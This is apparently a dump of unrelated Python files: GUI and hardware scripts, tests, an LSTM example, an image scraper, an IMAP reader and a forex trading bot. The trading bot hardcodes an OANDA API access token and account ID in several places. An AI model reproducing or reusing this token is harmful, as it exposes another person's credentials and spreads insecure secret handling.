996,652 | 385d1513724f5e99a6f37494992bea51312d3b6e | #!/usr/bin/env python
from PyQt4 import QtGui
from PyQt4 import QtCore
from led_classes import *
from db_classes import *
import time
class Example(QtGui.QWidget):
def __init__(self):
super(Example, self).__init__()
self.stop = False
self.running = False
self.initUI()
def initUI(self):
QtGui.QToolTip.setFont(QtGui.QFont('arial'))
self.setToolTip('This is a <b>QWidget</b> widget')
btn = QtGui.QPushButton('On', self)
btn.resize(btn.sizeHint())
btn.move(50, 50)
btn.clicked.connect(self.runLed)
btn2 = QtGui.QPushButton('Off', self)
btn2.resize(btn.sizeHint())
btn2.move(150, 50)
btn2.clicked.connect(self.stopLed)
self.label = QtGui.QLabel(self)
self.label.setText('Welcome to airmess')
self.label.setGeometry(50, 150, 200, 30)
self.setGeometry(100, 40, 400, 400)
self.setWindowTitle('Airmess')
self.show()
def stopLed(self):
self.stop=True
def runLed(self):
if(self.running==False):
self.running=True
db = Db()
transmission = Transmission()
window = Window(transmission)
transmission.warmUp()
time.sleep(1)
transmission.wakeUp()
while(-1):
for message in (db.fetch()):
self.label.setText(message[0])
print message[0]
window.write(message[0])
t1 = time.time()
for i in range( (window.width-96) ):
window.move(i)
wait = 4/100.0 - (time.time()-t1)
time.sleep(float(wait))
QtGui.QApplication.processEvents()
if self.stop:
break
print (time.time()-t1-4/100.0)*100
t1 = time.time()
if self.stop:
break
time.sleep(1)
if self.stop:
self.stop = False
self.running=False
break
'''
messages = ["Dine", "Alex","Corinne","Bernard"]
while(-1):
for message in messages:
window.write(message)
for i in range( 10 ):
window.move(96)
time.sleep(10/100.0/(i+1.0)/(i+1.0))
QtGui.QApplication.processEvents()
if self.stop:
break
if self.stop:
break
if self.stop:
self.stop = False
self.running=False
break
'''
|
996,653 | fbd2d974710072e52df10632a3269024c5b4656c | """@package tester
@brief Framework extension for Unittest.
@copyright Copyright (c) 2017 Marcel H
MIT License
Copyright (c) 2017 mh0401
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from ..utils import Traceable, Verbosity, assert_type, assert_cond, fullobjname, typename
# Import primitive module first
from .utils import PerfData, TestScenario, TestFailError
from .case import TestPackage, BaseTestCase, PerfTestCase
__all__ = ['TestScenario', 'TestFailError',
'BaseTestCase', 'PerfTestCase', 'TestPackage']
|
996,654 | 8ccf71ce180183ed0492b5303d58dc82a083ab58 | import math
year = input()
holidays = int(input())
weekends = int(input())
saturday_games = (48 - weekends) * 3 / 4
holiday_games = holidays * 2 / 3
total_games = saturday_games + holiday_games + weekends
if year == 'leap':
total_games += total_games * 0.15
print(math.floor(total_games)) |
996,655 | 1eec293476a3c91c3a237f3f4a19826a1790863c | import imaplib, email
class IMAPWrapper:
"""
Class to connect to imap server login and extracting emails
between two given dates
"""
def __init__(self,username,password):
try:
self.mail=imaplib.IMAP4('imap.iitb.ac.in',143)
self.mail.login(username,password)
self.mail.select('inbox')
except:
print "Wrong Password"
def get_mails(self,date1,date2):
msgs=[]
query = '(SINCE ' + date1 + ' BEFORE ' + date2 + ' TO "events@iitb.ac.in" )'
typ,data=self.mail.search(None,query)
for num in data[0].split():
msg=self.mail.fetch(num,'(RFC822)')
msg=email.message_from_string(msg[1][0][1])
body=""
for part in msg.walk():
if part.get_content_type() == 'text/plain':
body="\n" + part.get_payload() + "\n"
msgs.append([msg['From'],msg['Subject'],body])
return msgs
if __name__=="__main__":
username=raw_input("Username: ")
password=raw_input("Password: ")
date1="1-Aug-2012"
date2="15-Aug-2012"
acc = IMAPWrapper(username,password)
msgs=acc.get_mails(date1,date2)
print msgs[0]
|
996,656 | 7d1673db172b4e80931d8b13f02abb7b0537946c | from django.test import TestCase, SimpleTestCase
from .models import CustomUser
from django.urls import reverse
from .forms import CustomUserChangeForm
# Create your tests here.
class UserModelCreationlTest(TestCase):
def setUp(self):
CustomUser.objects.create(
username='test_user',
full_name='John Smith',
address1='123 Test Terrace',
address2='Suite 203',
city='Dallas',
)
def test_user_fields(self):
user = CustomUser.objects.get(id=1)
expected_user_name = f'{user.username}'
expected_full_name = f'{user.full_name}'
expected_address1 = f'{user.address1}'
expected_address2 = f'{user.address2}'
expected_city = f'{user.city}'
self.assertEqual(expected_user_name, 'test_user')
self.assertEqual(expected_full_name, 'John Smith')
self.assertEqual(expected_address1, '123 Test Terrace')
self.assertEqual(expected_address2, 'Suite 203')
self.assertEqual(expected_city, 'Dallas')
|
996,657 | 1e899668107087045b0890a8cf8f70f27cb696af | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Oct 23rd 2018
@author: lucagaegauf
Single epoch of LSTM
LSTM structure ----------------------------------------------------------------
Input Layer (x): 1 node
LSTM (h, c): 3 hidden states
- Forget, input, and output gates: sigmoid activated
- Hidden and cell states: Tanh activated
ft = sigmoid(Uf * Xt + Wf * Ht-1 + bf)
it = sigmoid(Ui * Xt + Wi * Ht-1 + bi)
ot = sigmoid(Uo * Xt + Wo * Ht-1 + bo)
Ct = ft * Ct-1 + it * tanH(Uc * Xt + Wc * Ht-1 + bc)
Ht = ot * tanH(Ct)
Output Layer (y): 1 node (linear activation)
yt = identity(Vy * Ht + by)
Variable key ------------------------------------------------------------------
w: weight
b: bias
f: function
e: error
d: derivative
bpe: backpropagation error
t: time index
Sources -----------------------------------------------------------------------
http://colah.github.io/posts/2015-08-Understanding-LSTMs/
"""
#%%
import numpy as np
#%% RNN training params -------------------------------------------------------
n_hidden_state = 3 # Number of hidden states
#%% Helper functions ----------------------------------------------------------
def f_sigmoid(x):
return 1 / (1 + np.exp(-x))
def f_dsigmoid(x):
return x * (1 - x)
def f_dtanh(x):
return 1 - (x ** 2)
def f_identity(x):
return x
def f_didentity(x):
return 1
#%% Generate and process data -------------------------------------------------
data = np.array([11, 0, 5, 5, 16])
data_length = len(data)
print('The sequence is {} time steps.'.format(data_length))
# Normalize data
data_mean = np.mean(data, axis=0)
data_sd = np.std(data, axis=0, ddof=1)
data = np.around((data - data_mean) / data_sd, 2)
data
#%% Initialize RNN parameters -------------------------------------------------
# Weights
U_f = np.array([[-0.2], [ 0.4], [-1.0]])
W_f = np.array([[-0.4, -0.7, -0.8],
[ 0.1, -0.5, 0.8],
[ 0.9, 0.4, 0.2]])
U_i = np.array([[-0.2], [-0.1], [ 0.2]])
W_i = np.array([[ 0.0, 1.4, -0.5],
[ 0.2, -0.5, 0.3],
[ 0.1, -0.5, -0.9]])
U_o = np.array([[-0.1], [ 0.5], [-0.7]])
W_o = np.array([[ 0.4, -0.1, -0.3],
[-0.2, 0.2, 0.3],
[ 0.1, 0.1, 0.1]])
U_c = np.array([[ 0.3], [ 0.1], [ 0.4]])
W_c = np.array([[-0.3, -0.3, -0.8],
[ 0.1, -0.5, 0.2],
[-0.3, -0.7, -0.1]])
V_y = np.array([[-0.6, -0.6, -0.3]])
# Biases
b_f = np.array([[ 0.3], [ 1.2], [-0.4]])
b_i = np.array([[ 0.4], [-0.3], [ 0.8]])
b_o = np.array([[ 0.6], [ 0.1], [ 0.6]])
b_c = np.array([[ 0.0], [-0.2], [-0.9]])
b_y = np.array([[ 0.5]])
#%% LSTM forward pass ---------------------------------------------------------
loss_sum = 0
inputs = data[:-1]
targets = data[1:]
seq_length = len(inputs)
ht = np.zeros((seq_length + 1, n_hidden_state))
ct = np.zeros((seq_length + 1, n_hidden_state))
ft = np.zeros((seq_length, n_hidden_state))
it = np.zeros((seq_length, n_hidden_state))
ot = np.zeros((seq_length, n_hidden_state))
# Initialize hidden and cell states
ht[0,:], ct[0,:] = np.array([1., 2., 3.]), np.array([1., 2., 3.])
yt = np.zeros((seq_length, 1))
xt = np.zeros((seq_length, 1))
loss = np.zeros((seq_length, 1))
for t in range(len(inputs)):
xt[t] = inputs[t]
ft[t,:] = f_sigmoid(U_f.T * xt[t] + np.dot(W_f.T, ht[t,:]) + b_f.T)
it[t,:] = f_sigmoid(U_i.T * xt[t] + np.dot(W_i.T, ht[t,:]) + b_i.T)
ot[t,:] = f_sigmoid(U_o.T * xt[t] + np.dot(W_o.T, ht[t,:]) + b_o.T)
ct[t+1,:] = ft[t,:] * ct[t,:] + it[t,:] * np.tanh(U_c.T * xt[t,:] + np.dot(W_c.T, ht[t,:]) + b_c.T)
ht[t+1,:] = ot[t,:] * np.tanh(ct[t+1,:])
yt[t] = f_identity(np.dot(V_y, ht[t+1,:]) + b_y) # RNN output node
loss[t] = 0.5 * np.square(yt[t] - targets[t]) # output loss
loss_sum += loss[t] / seq_length
#%%
print(np.around(ft, 2))
print(np.around(it, 2))
print(np.around(ot, 2))
print(np.around(ht, 2))
print(np.around(ct, 2))
|
996,658 | e4e9a7a51d642ee79f6d50cb0a9e044d016baa1b | import numpy as np
import cv2
import tensorflow as tf
class FaceMesh(object):
def __init__(self, model_path):
self.num_coords = 468
self.x_scale = 192
self.y_scale = 192
self.interpreter = tf.lite.Interpreter(model_path=model_path)
self.interpreter.allocate_tensors()
self.input_details = self.interpreter.get_input_details()
self.output_details = self.interpreter.get_output_details()
self.input_shape = self.input_details[0]['shape']
def predict_on_image(self, img):
# 画像の整形
raw_shape = img.shape[:2]
image = cv2.resize(img, (self.x_scale, self.y_scale)).reshape(tuple(self.input_shape)).astype(np.float32)/127.5-1.0
# 推論
self.interpreter.set_tensor(self.input_details[0]['index'], image)
self.interpreter.invoke()
regression_out = self.interpreter.get_tensor(self.output_details[0]['index'])
confidences_out = self.interpreter.get_tensor(self.output_details[1]['index'])
# 推論結果の整理
regression_out = regression_out.reshape(-1,3)
regression_out[:,0] *= raw_shape[1]/self.x_scale
regression_out[:,1] *= raw_shape[0]/self.y_scale
return regression_out, confidences_out.reshape(-1)
if __name__ == "__main__":
import matplotlib.pyplot as plt
raw_image = cv2.imread("images/face.jpg")
image = cv2.cvtColor(raw_image, cv2.COLOR_BGR2RGB)
model_path = "models/face_landmark.tflite"
mesh_maker = FaceMesh(model_path)
result, confidences = mesh_maker.predict_on_image(image)
for xyz in result:
cv2.circle(image, (xyz[0], xyz[1]), 3, (0, 255, 0), thickness=-1)
plt.imshow(image)
plt.show()
|
996,659 | 2ca613357bb5166b2efc06ee9a4cdf8127d5734a | #!/usr/bin/env python3
from locale import getpreferredencoding
from sys import stderr
print("locale:", getpreferredencoding(do_setlocale=True), file=stderr)
print('…', file=stderr)
print('…')
|
996,660 | 688d92a2df25959c6eee5bbaa7e92568232b5b4e | from .confronta_estoque import *
from .estoque_na_data import *
from .executa_ajuste import *
from .edita_estoque import *
from .index import *
from .item_no_tempo import *
from .lista_docs_mov import *
from .lista_movs import *
from .mostra_estoque import *
from .movimenta import *
from .posicao_estoque import *
from .referencia_deposito import *
from .refs_com_movimento import *
from .transferencia import *
from .valor_mp import *
|
996,661 | 1e75167a475921d2f1e00dbc8e574ea990dd2606 | import requests
from bs4 import BeautifulSoup
url = "https://en.wikipedia.org/wiki/Seoul_Metropolitan_Subway"
resp = requests.get(url)
html_src = resp.text
soup = BeautifulSoup(html_src, 'html.parser')
target_img = soup.find(name='img', attrs={'alt':'Seoul-Metro-2004-20070722.jpg'})
print('HTML 요소: ', target_img)
print("\n")
target_img_src = target_img.get('src')
print('이미지 파일 경로: ', target_img_src)
print("\n")
target_img_resp = requests.get('http:' + target_img_src)
out_file_path = "./output/download_image.jpg"
with open(out_file_path, 'wb') as out_file:
out_file.write(target_img_resp.content)
print("이미지 파일로 저장하였습니다.")
|
996,662 | 32220214d199a4a73096cadc7a03190e17df4c12 | def find_digit(a):
count=0
a_int=int(a)
a_list=[]
for i in range(len(a)):
a_list.append(int(a[i]))
for j in range(len(a_list)):
try:
if a_int%a_list[j]==0:
count+=1
else:
continue
except ZeroDivisionError:
continue
print count
loop = int(raw_input())
for m in range(loop):
a = raw_input()
find_digit(a)
|
996,663 | 8ace9c931a9cf2cfdae114e2b37b41c0b412ee52 | from ExtraccionDatosOanda import ExtraccionOanda
from analisis_y_estrategia import analisis_y_estrategia
from multiprocessing import Process, Array
from ExtraccionDatos10s import extraccion_10s_continua
from ContadorEstrategia import ContadorEstrategias
from SeguimientoRangos import SeguimientoRangos
import time
import pandas as pd
import oandapyV20
import oandapyV20.endpoints.pricing as pricing
class dinero_invertido:
def __init__(self, monto):
self.monto = monto
def calcular_rango_sop_res(ohlc, rango_velas):
resistencia_mayor = ohlc["h"].rolling(rango_velas).max().dropna()
resistencia_menor = ohlc["c"].rolling(rango_velas).max().dropna()
soporte_menor = ohlc["l"].rolling(rango_velas).min().dropna()
soporte_mayor = ohlc["c"].rolling(rango_velas).min().dropna()
resistencia_punto_mayor = resistencia_mayor.iloc[-1]
resistencia_punto_menor = resistencia_menor.iloc[-1]
for data in range(-rango_velas, 0):
precio_h = ohlc['h'].iloc[data]
precio_o = ohlc['o'].iloc[data]
precio_c = ohlc['c'].iloc[data]
if precio_h > resistencia_punto_menor > precio_c:
if precio_c >= precio_o:
resistencia_punto_menor = precio_c
elif precio_c < precio_o < resistencia_punto_menor:
resistencia_punto_menor = precio_o
soporte_punto_menor = soporte_menor.iloc[-1]
soporte_punto_mayor = soporte_mayor.iloc[-1]
for data in range(-rango_velas, 0):
precio_l = ohlc['l'].iloc[data]
precio_o = ohlc['o'].iloc[data]
precio_c = ohlc['c'].iloc[data]
if precio_l < soporte_punto_mayor < precio_c:
if precio_c <= precio_o:
soporte_punto_mayor = precio_c
elif precio_c > precio_o > soporte_punto_mayor:
soporte_punto_mayor = precio_o
return resistencia_punto_mayor, resistencia_punto_menor, soporte_punto_menor, soporte_punto_mayor
def run(tiempo_de_ejecucion_minutos, primera_divisa, segunda_divisa, numero_noticias,
horas_noticias, monto):
print("comenzando")
monto = dinero_invertido(monto)
contador_est = ContadorEstrategias()
objeto_rango = SeguimientoRangos()
timeout = time.time() + (tiempo_de_ejecucion_minutos * 60)
divisa = f"{primera_divisa}_{segunda_divisa}"
client = oandapyV20.API(access_token="e51f5c80499fd16ae7e9ff6676b3c53f-3ac97247f6df3ad7b2b3731a4b1c2dc3",
environment="practice")
live_price_request = pricing.PricingInfo(accountID="101-011-12930479-001", params={"instruments": divisa})
ExtraccionOanda(client, 500, 'M1', divisa)
ExtraccionOanda(client, 500, 'M5', divisa)
ExtraccionOanda(client, 500, 'M30', divisa)
proceso_10s = Process(target=extraccion_10s_continua, args=(divisa, timeout, objeto_rango, monto))
proceso_10s.start()
time.sleep(30)
datos_1min = pd.read_csv("datos_M1.csv", index_col="time")
# Se calcula el rango de soporte y resistencia de 1 minuto a un rango de 120 velas
resistencia_punto_mayor_1m, resistencia_punto_menor_1m, soporte_punto_menor_1m, soporte_punto_mayor_1m = \
calcular_rango_sop_res(datos_1min, 120)
datos_5min = pd.read_csv("datos_M5.csv", index_col="time")
# Se calcula el rango de soporte y resistencia de 5 minuto a un rango de 50 velas
resistencia_punto_mayor_5m, resistencia_punto_menor_5m, soporte_punto_menor_5m, soporte_punto_mayor_5m = \
calcular_rango_sop_res(datos_5min, 50)
datos_30min = pd.read_csv("datos_M30.csv", index_col="time")
# Se calcula el rango de soporte y resistencia de 30 minuto a un rango de 50 velas
resistencia_punto_mayor_30m, resistencia_punto_menor_30m, soporte_punto_menor_30m, soporte_punto_mayor_30m = \
calcular_rango_sop_res(datos_30min, 50)
while time.time() <= timeout:
try:
if numero_noticias == 1:
if time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))[:-3] == horas_noticias[0]:
time.sleep(1800)
elif numero_noticias == 2:
if time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))[:-3] == horas_noticias[0]:
time.sleep(1800)
elif time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))[:-3] == horas_noticias[1]:
time.sleep(1800)
elif numero_noticias == 3:
if time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))[:-3] == horas_noticias[0]:
time.sleep(1800)
elif time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))[:-3] == horas_noticias[1]:
time.sleep(1800)
elif time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))[:-3] == horas_noticias[2]:
time.sleep(1800)
# actualizacion de datos 1m
if (f"{(int(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))[14:16]) - 1):02}" != \
datos_1min.iloc[-1].name[14:16]):
try:
ExtraccionOanda(client, 500, 'M1', divisa)
except Exception as e:
print(f"excepcion {e}: {type(e)}")
client = oandapyV20.API(
access_token="e51f5c80499fd16ae7e9ff6676b3c53f-3ac97247f6df3ad7b2b3731a4b1c2dc3",
environment="practice")
datos_1min = pd.read_csv("datos_M1.csv", index_col="time")
resistencia_punto_mayor_1m, resistencia_punto_menor_1m, soporte_punto_menor_1m, soporte_punto_mayor_1m = \
calcular_rango_sop_res(datos_1min, 120)
# actualizacion de datos 5m
if ((int(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))[15:16])) == 1 or (
int(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))[15:16])) == 6) and \
(datos_5min.iloc[-1].name[
14:16] != f"{int(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))[14:16]) - 1:02}"):
try:
ExtraccionOanda(client, 500, 'M5', divisa)
except Exception as e:
print(f"excepcion {e}: {type(e)}")
client = oandapyV20.API(
access_token="e51f5c80499fd16ae7e9ff6676b3c53f-3ac97247f6df3ad7b2b3731a4b1c2dc3",
environment="practice")
datos_5min = pd.read_csv("datos_M5.csv", index_col="time")
resistencia_punto_mayor_5m, resistencia_punto_menor_5m, soporte_punto_menor_5m, soporte_punto_mayor_5m = \
calcular_rango_sop_res(datos_5min, 50)
# actualizacion de datos 30m
if ((int(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))[14:16])) == 31 or
time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))[14:16]) == "01" and \
(datos_30min.iloc[-1].name[
14:16] != f"{int(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))[14:16]) - 1:02}"):
try:
ExtraccionOanda(client, 500, 'M30', divisa)
except Exception as e:
print(f"excepcion {e}: {type(e)}")
client = oandapyV20.API(
access_token="e51f5c80499fd16ae7e9ff6676b3c53f-3ac97247f6df3ad7b2b3731a4b1c2dc3",
environment="practice")
datos_30min = pd.read_csv("datos_M30.csv", index_col="time")
resistencia_punto_mayor_30m, resistencia_punto_menor_30m, soporte_punto_menor_30m, soporte_punto_mayor_30m = \
calcular_rango_sop_res(datos_30min, 50)
datos_10s = pd.read_csv("datos_10s.csv", index_col="time")
except Exception as e:
print(f"excepcion {e}: {type(e)}")
print("hubo error en lectura de datos csv")
analisis_y_estrategia(datos_10s, datos_1min, datos_5min, datos_30min, divisa, resistencia_punto_mayor_1m,
resistencia_punto_menor_1m, resistencia_punto_mayor_5m,
resistencia_punto_menor_5m, soporte_punto_menor_1m, soporte_punto_mayor_1m,
soporte_punto_menor_5m, soporte_punto_mayor_5m, resistencia_punto_mayor_30m,
resistencia_punto_menor_30m, soporte_punto_menor_30m, soporte_punto_mayor_30m,
monto, client, live_price_request, contador_est)
time.sleep(10)
if __name__ == "__main__":
primera_divisa = input("introduzca la primera divisa: ")
segunda_divisa = input("introduzca la segunda divisa: ")
monto = input("introduzca el monto a invertir: ")
mes = input("introduzca el mes de inicio: ")
dia = input("introduzca el dia de inicio: ")
hora = input("introduzca la hora de inicio (militar): ")
minuto = input("introduzca el minuto de inicio: ")
tiempo = int(input("introduzca el tiempo de ejecucion en minutos: "))
numero_noticias = int(input("Introduzca el numero de noticias: "))
noticia1 = 0
noticia2 = 0
noticia3 = 0
if numero_noticias == 0:
pass
elif numero_noticias == 1:
hora_noticia = input("Introduzca la hora de la noticia 15 minutos antes: ")
minuto_noticia = input("Introduzca el minuto de la noticia 15 minutos antes: ")
noticia1 = f'2020-{mes}-{dia} {hora_noticia}:{minuto_noticia}'
elif numero_noticias == 2:
hora_noticia1 = input("Introduzca la hora de la primera noticia 15 minutos antes: ")
minuto_noticia1 = input("Introduzca el minuto de la primera noticia 15 minutos antes: ")
noticia1 = f'2020-{mes}-{dia} {hora_noticia1}:{minuto_noticia1}'
hora_noticia2 = input("Introduzca la hora de la segunda noticia 15 minutos antes: ")
minuto_noticia2 = input("Introduzca el minuto de la segunda noticia 15 minutos antes: ")
noticia2 = f'2020-{mes}-{dia} {hora_noticia2}:{minuto_noticia2}'
elif numero_noticias == 3:
hora_noticia1 = input("Introduzca la hora de la primera noticia 15 minutos antes: ")
minuto_noticia1 = input("Introduzca el minuto de la noticia 15 minutos antes: ")
noticia1 = f'2020-{mes}-{dia} {hora_noticia1}:{minuto_noticia1}'
hora_noticia2 = input("Introduzca la hora de la segunda noticia 15 minutos antes: ")
minuto_noticia2 = input("Introduzca el minuto de la segunda noticia 15 minutos antes: ")
noticia2 = f'2020-{mes}-{dia} {hora_noticia2}:{minuto_noticia2}'
hora_noticia3 = input("Introduzca la hora de la tercera noticia 15 minutos antes: ")
minuto_noticia3 = input("Introduzca el minuto de la tercera noticia 15 minutos antes: ")
noticia3 = f'2020-{mes}-{dia} {hora_noticia1}:{minuto_noticia1}'
while time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())) != f'2020-{mes}-{dia} {hora}:{minuto}:00':
pass
run(tiempo, primera_divisa, segunda_divisa,numero_noticias, (noticia1, noticia2, noticia3), monto)
|
996,664 | 073ec1ba7edd68ea713a7adcbe29a5cae62cb873 | import utility
import helper
import pickle
import numpy as np
def load_datasets(path, filenames):
X = np.load(path + filenames[0])
Y = np.load(path + filenames[1])
return (X, Y)
def test(filename):
fp = open(filename, 'rb')
data = pickle.load(fp)
fp.close()
weights = data.get('weights')
weights = helper.lists_toarray(weights)
model = utility.getNewModel()
model.set_weights(weights)
X, Y = load_datasets(
"../",
["mnist-test-images.npy", "mnist-test-labels.npy"]
)
pred = utility.predict(model, X)
print(np.argmax(pred, axis=1), Y)
print(sum(np.argmax(pred, axis=1) == Y) / Y.shape[0])
if __name__ == "__main__":
test('model')
|
996,665 | 428c989911121f9a1487d29313a57eff4bb21d7a | def add(a, b):
print "Passed a=%s and b=%s, returning a+b=%s" % (a,b,a+b)
return a + b
|
996,666 | fcec9a84465f521b8b9faeabf794cd88b3ce1907 | #!/usr/bin/env python3
string = input('Digite uma string: ')
def eh_minuscula1(original):
''' Permite somente letras minúsculas (inclusive com acentuação). '''
for c in original:
if not c.islower():
return False
return True
def eh_minuscula2(original):
''' Permite letras minúsculas (inclusive com acentuação), pontuação, números, etc. '''
convertida = string.lower()
return original == convertida
def eh_minuscula3(original):
''' Permite somente letras minúsculas (sem acentuação). '''
import string
for c in original:
if c not in string.ascii_lowercase: # 'abcdefghijklmnopqrstuvwxyz' # not locale-dependent
return False
return True
print('A string', 'é' if eh_minuscula1(string) else 'não é', 'toda minúscula')
|
996,667 | ed36b490b0d637d23d806b09bdde42e9b9d92d19 | from collections import UserDict
from numbers import Integral
class CellSpace(UserDict):
""" CellSpace adds 2D slicing and bounds information to dicts of (x,y) coordinate pairs.
Notes: CellSpace does not support assigning by slice at this point.
Height and width are not absolute measures of how many cells CellSpace contains in
either direction. Instead they show the max labeled cell, this can be considered
either a bug or a feature. Max labeled cell in this case means the cell with the
largest index in that direction (height or width).
"""
def __init__(self, *args, **kwargs):
self.width = 1
self.height = 1
super().__init__(*args, **kwargs)
def __setitem__(self, key, item):
self.data[key] = item
if isinstance(key,(tuple,list,set)):
if key[0] >= self.width:
self.width = key[0] + 1
if key[1] >= self.height:
self.height = key[1] + 1
def __getitem__(self, index):
cls = type(self)
new_cells = cls()
width = self.width
height = self.height
try:
# handle the case where both items are integers [int,int] aka cell case
return self.data[(index[0], index[1])]
except TypeError:
if isinstance(index, tuple) and isinstance(index[0], slice) and isinstance(index[1],
slice):
# handle the case where both items are slices aka box case
x_s = index[0].indices(width) # indices returns a (start, stop, stride) tuple
y_s = index[1].indices(height)
for y_index, y in enumerate(range(*y_s)):
for x_index, x in enumerate(range(*x_s)):
new_cells[(x_index, y_index)] = self.data[(x, y)]
return new_cells
elif isinstance(index, tuple) and isinstance(index[0], slice) and isinstance(index[1], Integral):
# handle the case where x is a slice, but y is an integer [int:int, int] aka row case
x_s = index[0].indices(width)
for x_index, x in enumerate(range(*x_s)):
new_cells[(x_index, 0)] = self.data[(x, index[1])]
return new_cells
elif isinstance(index, tuple) and isinstance(index[0], Integral) and isinstance(index[1], slice):
# handle the case where x is an integer, but y is a slice [int, int:int] aka column case
y_s = index[1].indices(height)
for y_index, y in enumerate(range(*y_s)):
new_cells[(0, y_index)] = self.data[(index[0], y)]
return new_cells
else:
msg = '{cls.__name__} indices must be integers'
raise TypeError(msg.format(cls=cls)) |
996,668 | 8f0584445aa53a4c546787efc74bbc34cc6090be | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# temp_LED.py
#
# Use a thermistor to read temperatures and illuminate
# a number of LEDs based upon the returned temperature
#
# Copyright 2015 Ken Powers
#
import time, math
import RPi.GPIO as GPIO
# Set GPIO pins to Broadcom numbering system
GPIO.setmode(GPIO.BCM)
# Define our constants
RUNNING = True
led_list = [17,27,22,10,9,11,13,26] # GPIO pins for LEDs
temp_low = 70 # Lowest temperature for LEDs (F)
temp_high = 86 # Highest temperature for LEDs (F)
a_pin = 23
b_pin = 24
# Set up our LED GPIO pins as outputs
for x in range(0,8):
GPIO.setup(led_list[x], GPIO.OUT)
GPIO.output(led_list[x], GPIO.LOW)
# Try to keep this value near 1 but adjust it until
# the temperature readings match a known thermometer
adjustment_value = 0.97
# Create a function to take an analog reading of the
# time taken to charge a capacitor after first discharging it
# Perform the procedure 100 times and take an average
# in order to minimize errors and then convert this
# reading to a resistance
def resistance_reading():
total = 0
for i in range(1, 100):
# Discharge the 330nf capacitor
GPIO.setup(a_pin, GPIO.IN)
GPIO.setup(b_pin, GPIO.OUT)
GPIO.output(b_pin, False)
time.sleep(0.01)
# Charge the capacitor until our GPIO pin
# reads HIGH or approximately 1.65 volts
GPIO.setup(b_pin, GPIO.IN)
GPIO.setup(a_pin, GPIO.OUT)
GPIO.output(a_pin, True)
t1 = time.time()
while not GPIO.input(b_pin):
pass
t2 = time.time()
# Record the time taken and add to our total for
# an eventual average calculation
total = total + (t2 - t1) * 1000000
# Average our time readings
reading = total / 100
# Convert our average time reading to a resistance
resistance = reading * 6.05 - 939
return resistance
# Create a function to convert a resistance reading from our
# thermistor to a temperature in Celsius which we convert to
# Fahrenheit and return to our main loop
def temperature_reading(R):
B = 3977.0 # Thermistor constant from thermistor datasheet
R0 = 10000.0 # Resistance of the thermistor being used
t0 = 273.15 # 0 deg C in K
t25 = t0 + 25.0 # 25 deg C in K
# Steinhart-Hart equation
inv_T = 1/t25 + 1/B * math.log(R/R0)
T = (1/inv_T - t0) * adjustment_value
return T # Convert C to F
if __name__ == '__main__':
# Main loop
try:
while RUNNING:
# Get the thermistor temperature
t = temperature_reading(resistance_reading())
# Print temperature values in real time
print(t)
# Time interval for taking readings in seconds
time.sleep(0.1)
# If CTRL+C is pressed the main loop is broken
except KeyboardInterrupt:
RUNNING = False
# Actions under 'finally' will always be called
# regardless of what stopped the program
finally:
# Stop and cleanup to finish cleanly so the pins
# are available to be used again
GPIO.cleanup()
|
996,669 | 857af81c95856968d113793b56ad3686b8cc34f5 | import csv
import pandas as pd
import numpy as np
import ast
from itertools import product
from gurobipy import *
from network import Network
from od_demand_generator import demand_generator
from weightedzips import ZipCoords
from network import dist
from output import write_arcs_to_csv, write_zd_to_csv
datapath = "C:/Users/kbada/PycharmProjects/forged-by-machines/"
def create_stochastic_network():
"""
no information specific to a scenario: a general network structure
create a network with all scenario commodities
essentially add multiple commodities for same o-z pair: might wanna test nefore creating a model
:return:
"""
# initialise a network
network = Network()
# Add nodes to network
nodes = pd.read_csv(datapath + "Node location.csv", usecols=['node name', 'location'])
for index, row in nodes.iterrows():
name = row['node name']
lat = ast.literal_eval(row['location'])[0]
lon = ast.literal_eval(row['location'])[1]
network.add_node(name, lat, lon)
# Add arcs to network
# Origin-Trans
for node1 in network.get_origin_nodes():
for node2 in network.get_trans_nodes():
network.add_arc(node1, node2)
# Trans-Destination
for node1 in network.get_trans_nodes():
for node2 in network.get_dest_nodes():
network.add_arc(node1, node2)
# Origin-Destination
for node1 in network.get_origin_nodes():
for node2 in network.get_dest_nodes():
network.add_arc(node1, node2)
# Add commodities to network
# Add zips to network: zip long and zip lat should be weighted and fixed: impossible to vary in each scenario as
# we are simulating demand zip directly: hence no customer information in scenarios
# Maybe we can evaluate zip location in each scenario and take average
with open(datapath + "ZIP CODE.csv", newline='') as f:
reader = csv.reader(f)
zips = list(reader)
zips = zips[0]
zip_coords = ZipCoords()
for zip_name in zips:
# drop empty space: took 4 hours to find this bug
zip_name = zip_name.replace(" ", "")
network.add_zip(zip_name, zip_coords.get_lat(zip_name), zip_coords.get_lon(zip_name)) # temporarily using 0,0
